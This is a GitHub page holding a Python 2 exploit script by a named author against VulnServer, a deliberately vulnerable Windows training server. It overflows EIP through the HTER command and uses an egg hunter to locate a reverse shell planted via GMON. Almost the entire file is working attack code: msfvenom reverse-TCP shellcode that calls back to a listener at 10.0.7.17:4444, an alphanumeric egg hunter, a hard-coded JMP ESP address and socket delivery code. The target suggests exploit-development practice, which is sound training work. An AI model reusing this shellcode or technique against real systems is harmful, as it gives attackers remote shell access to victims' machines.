-
Notifications
You must be signed in to change notification settings - Fork 0
/
vulnserver-hter-eip.py
104 lines (86 loc) · 3.09 KB
/
vulnserver-hter-eip.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
#!/usr/bin/python
# Title : VulnServer EIP Overflow in HTER + Egg in GMON
# OS : Windows XP Pro SP3 x86 English
# Name : Jonathan "Chops" Crosby
# Email : me@securitychops.com
# Twitter : @securitychops
# Website : https://securitychops.com
import socket
import sys
import time
# msfvenom -a x86 --platform windows -p windows/shell_reverse_tcp LHOST=10.0.7.17 LPORT=4444 -f c -b '\x00'
revshell = (
# our egg
"T00WT00W"
# baby nopsled for decode if needed
"\x90\x90\x90\x90"
# our reverse shell
"\xbf\xaf\x1c\x0d\x7d\xd9\xe8\xd9\x74\x24\xf4\x5d\x31\xc9\xb1"
"\x4f\x31\x7d\x14\x83\xc5\x04\x03\x7d\x10\x4d\xe9\xf1\x95\x18"
"\x12\x0a\x66\x7a\x9a\xef\x57\xa8\xf8\x64\xc5\x7c\x8a\x29\xe6"
"\xf7\xde\xd9\x7d\x75\xf7\xee\x36\x33\x21\xc0\xc7\xf2\xed\x8e"
"\x04\x95\x91\xcc\x58\x75\xab\x1e\xad\x74\xec\x43\x5e\x24\xa5"
"\x08\xcd\xd8\xc2\x4d\xce\xd9\x04\xda\x6e\xa1\x21\x1d\x1a\x1b"
"\x2b\x4e\xb3\x10\x63\x76\xbf\x7e\x54\x87\x6c\x9d\xa8\xce\x19"
"\x55\x5a\xd1\xcb\xa4\xa3\xe3\x33\x6a\x9a\xcb\xb9\x73\xda\xec"
"\x21\x06\x10\x0f\xdf\x10\xe3\x6d\x3b\x95\xf6\xd6\xc8\x0d\xd3"
"\xe7\x1d\xcb\x90\xe4\xea\x98\xff\xe8\xed\x4d\x74\x14\x65\x70"
"\x5b\x9c\x3d\x56\x7f\xc4\xe6\xf7\x26\xa0\x49\x08\x38\x0c\x35"
"\xac\x32\xbf\x22\xd6\x18\xa8\x87\xe4\xa2\x28\x80\x7f\xd0\x1a"
"\x0f\x2b\x7e\x17\xd8\xf5\x79\x58\xf3\x41\x15\xa7\xfc\xb1\x3f"
"\x6c\xa8\xe1\x57\x45\xd1\x6a\xa8\x6a\x04\x3c\xf8\xc4\xf7\xfc"
"\xa8\xa4\xa7\x94\xa2\x2a\x97\x84\xcc\xe0\xae\x83\x5b\x01\xb1"
"\x0c\x8d\x7d\xb3\x12\xbc\x21\x3a\xf4\xd4\xc9\x6a\xaf\x40\x73"
"\x37\x3b\xf0\x7c\xed\xab\x91\xef\x6a\x2b\xdf\x13\x25\x7c\x88"
"\xe2\x3c\xe8\x24\x5c\x97\x0e\xb5\x38\xd0\x8a\x62\xf9\xdf\x13"
"\xe6\x45\xc4\x03\x3e\x45\x40\x77\xee\x10\x1e\x21\x48\xcb\xd0"
"\x9b\x02\xa0\xba\x4b\xd2\x8a\x7c\x0d\xdb\xc6\x0a\xf1\x6a\xbf"
"\x4a\x0e\x42\x57\x5b\x77\xbe\xc7\xa4\xa2\x7a\xf7\xee\xee\x2b"
"\x90\xb6\x7b\x6e\xfd\x48\x56\xad\xf8\xca\x52\x4e\xff\xd3\x17"
"\x4b\xbb\x53\xc4\x21\xd4\x31\xea\x96\xd5\x13"
)
# IP and Port for VulnServer
host = '192.168.31.132'
port = 6666
# egg hunter to search for T00WT00W
egg_hunter = (
# need and extra 0 to push the instructions
# into the correct place
"0"
# since this exploit is using literal
# alpha numeric values this is the literal
# egg hunter in alpha numberic
"6681caff0f425231db43435358cd2e3c055a74ecb85430305789d7af75e7af75e4ffe7"
)
# starting off the payload with HTER
payload = "HTER "
# nops backwards
payload += "09" * 950
# egg hunter
payload += egg_hunter
# A's cause it dosent matter here
payload += "A" * (141 - len(egg_hunter))
# JMP ESP is 62501203
eip_jmp_esp = "03125062"
payload += eip_jmp_esp
# everything is backwards!
payload += "9090EB80"
payload += "A" * (3055 - len(eip_jmp_esp) - len(revshell) - 8)
payload += "\x0a"
# this will get our egg/revshell into memory without errors...
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host,port))
print s.recv(4096)
egg = "GMON "
egg += revshell
egg += "\x0a"
s.send(egg)
print s.recv(4096)
s.close()
# sleep for a few seconds
time.sleep(2)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host,port))
print s.recv(4096)
s.send(payload)
print s.recv(4096)